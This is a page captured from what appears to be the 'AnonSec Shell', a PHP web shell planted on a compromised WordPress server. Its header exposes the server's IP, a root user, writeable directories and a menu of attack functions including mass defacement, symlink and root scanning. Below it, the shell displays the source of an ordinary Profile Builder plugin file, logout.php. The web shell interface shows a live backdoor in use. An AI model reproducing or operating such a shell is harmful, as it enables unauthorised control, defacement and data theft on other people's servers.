AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 18.191.44.3   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/profile-builder/front-end/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/profile-builder/front-end//logout.php
<?php
    if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly

    /*
     * Function that returns a front-end logout message from the wppb-logout shortcode
     *
     * @param $atts     The shortcode attributes
     */
    function wppb_front_end_logout( $atts ) {

        if( !is_user_logged_in() )
            return;

        $current_user = get_userdata( get_current_user_id() );

        $wppb_generalSettings = get_option( 'wppb_general_settings' );

        if( !empty( $wppb_generalSettings['loginWith'] ) && $wppb_generalSettings['loginWith'] == 'email' ) {
            $display_username_email = $current_user->user_email;
        }
        else {
            $display_username_email = $current_user->user_login;
        }

        $atts = shortcode_atts( array(
            'text'              => sprintf(__('You are currently logged in as %s. ', 'profile-builder'), $display_username_email),
            'redirect'          => '',
            'redirect_url'      => wppb_curpageurl(),
            'redirect_priority' => 'normal',
            'link_text'         => __('Log out &raquo;', 'profile-builder'),
            'url_only'          => '',
        ), $atts, 'wppb-logout' );

        if( ! empty( $atts['redirect'] ) ) {
            $atts['redirect_url'] = $atts['redirect'];
        }

        // CHECK FOR REDIRECT
        $redirect_url = wppb_get_redirect_url( $atts['redirect_priority'], 'after_logout', $atts['redirect_url'], $current_user );
        $redirect_url = apply_filters( 'wppb_after_logout_redirect_url', $redirect_url );

        if( isset( $atts['url_only'] ) && $atts['url_only'] == 'yes' )
            return wp_logout_url( $redirect_url );

        $logout_link = '<a href="' . wp_logout_url( $redirect_url ) . '" class="wppb-logout-url" title="' . __( 'Log out of this account', 'profile-builder' ) . '">' . $atts['link_text'] . '</a>';

        $meta_tags = apply_filters( 'wppb_front_end_logout_meta_tags', array( '{{meta_user_name}}', '{{meta_first_name}}', '{{meta_last_name}}', '{{meta_display_name}}' ) );
        $meta_tags_values = apply_filters( 'wppb_front_end_logout_meta_tags_values', array( $current_user->user_login, $current_user->first_name, $current_user->last_name, $current_user->display_name ) );

        $text = apply_filters( 'wppb_front_end_logout_text', str_replace( $meta_tags, $meta_tags_values, $atts['text'] ), $current_user );

        return apply_filters( 'wppb_logout_message', '<p class="wppb-front-end-logout"><span>' . $text . '</span>' . $logout_link . '</p>');
    }

Anon7 - 2022
AnonSec Team